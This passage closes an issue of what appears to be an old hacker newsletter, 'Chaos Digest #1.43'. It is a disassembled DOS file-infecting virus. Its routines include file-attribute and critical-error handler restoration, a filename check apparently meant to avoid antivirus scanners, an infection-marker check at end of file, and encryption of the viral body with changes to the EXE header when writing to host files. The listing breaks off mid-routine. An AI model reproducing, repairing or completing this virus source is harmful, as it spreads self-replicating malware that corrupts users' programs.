  MOV AX,05701
  MOV DX,W[09AC]
  MOV CX,W[09AE]
  CALL 06B4                 ;Masm Mod. Needed

CLOSE_THE_FILE:
  MOV AH,03E
  CALL 06B4                 ;Masm Mod. Needed

RESTORE_FILE_ATTRIBUTE:
  POP DS
  POP DX
  MOV AX,04301
  CS MOV CX,W[09AA]         ;Masm Mod. Needed
  CALL INT_21

RESTORE_CRIT_HANDLER:
  MOV AX,02524
  CS LDS DX,[09B8]          ;Masm Mod. Needed
  CALL INT_21

BAD_NAME:
  POP DS
  POP ES
  POP DI
  POP SI
  POP DX
  POP CX
  POP BX
  POP AX
  RET

CHECK_LETTERS_IN_FILENAME:
  PUSH DS
  POP ES
  MOV DI,DX
  MOV CX,-1
  XOR AL,AL
  CLD
  REPNE SCASB
  NOT CX
  MOV DI,DX
  MOV AX,04353
  MOV SI,CX
  SCASW
  JE 07B7             ;Masm Mod. Needed
  DEC DI
  LOOP 07A5           ;Masm Mod. Needed
  MOV CX,SI
  MOV DI,DX
  MOV AL,056
  REPNE SCASB
  JE 07B7             ;Masm Mod. Needed
  CLC
  RET
  STC
  RET

READ_PAST_END_OF_FILE:
  MOV CX,-1
  MOV DX,-0A
  CALL 06A8           ;Masm Mod. Needed
  MOV DX,0A65
  MOV CX,8
  CALL 069A           ;Masm Mod. Needed
  JB RET              ;Masm Mod. Needed
  CMP W[0A65],0FDF0   ;Masm Mod. Needed
  JNE 07F0            ;Masm Mod. Needed
  CMP W[0A67],0AAC5   ;Masm Mod. Needed
  JNE 07F0            ;Masm Mod. Needed
  MOV CX,-1
  MOV DX,-9
  CALL 06A8           ;Masm Mod. Needed
  MOV DX,0A6B
  MOV CX,4
  CALL 0696           ;Masm Mod. Needed
  RET
  CLC
  RET

ENCRYPT_AND_WRITE_TO_FILE:
  CALL MOVE_TO_END_OF_FILE
  MOV SI,AX
  MOV DI,DX
  MOV BX,0A49
  MOV AX,W[BX+4]
  MUL W[0D]           ;Masm Mod. Needed
  SUB AX,SI
  SBB DX,DI
  JAE 080C            ;Masm Mod. Needed
  JMP OUT_OF_ENCRYPT
  MOV AX,W[BX+8]
  MUL W[0B]           ;Masm Mod. Needed
  SUB SI,AX
  SBB DI,DX
  MOV AX,W[BX+0E]
  MOV W[4],AX         ;Masm Mod. Needed
  ADD W[4],010        ;Masm Mod. Needed
  MUL W[0B]           ;Masm Mod. Needed
  ADD AX,W[BX+010]
  SUB AX,SI
  SBB DX,DI
  JB 083C             ;Masm Mod. Needed
  SUB AX,080
  SBB DX,0
  JB RET              ;Masm Mod. Needed
  ADD W[BX+0E],09B
  MOV AX,W[BX+016]
  ADD AX,010
  MOV W[2],AX         ;Masm Mod. Needed
  MOV AX,W[BX+014]
  MOV W[0],AX         ;Masm Mod. Needed
  CALL 06A4           ;Masm Mod. Needed
  ADD AX,09A4
  ADC DX,0
  DIV W[0D]           ;Masm Mod. Needed
  INC AX
  MOV W[0A4D],AX      ;Masm Mod. Needed
  MOV W[0A4B],DX      ;Masm Mod. Needed
  MOV DX,DI
  MOV AX,SI
  DIV W[0B]           ;Masm Mod. Needed
  MOV W[0A5F],AX      ;Masm Mod. Needed
  MOV BX,DX
  ADD DX,0960
  MOV W[0A5D],DX      ;Masm Mod. Needed
  CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE
  JB RET              ;Masm Mod. Needed
  OR W[09AE],01F      ;Masm Mod. Needed
  MOV BX,W[09BC]
  AND BX,01F
  SHL BX,1
  MOV AX,W[BX+0E8]
  MOV W[0A5B],AX       ;Masm Mod. Needed
  CALL MOVE_TO_BEGINNING_OF_FILE
  MOV CX,01C
  MOV DX,0A49

------------------------------

End of Chaos Digest #1.43
************************************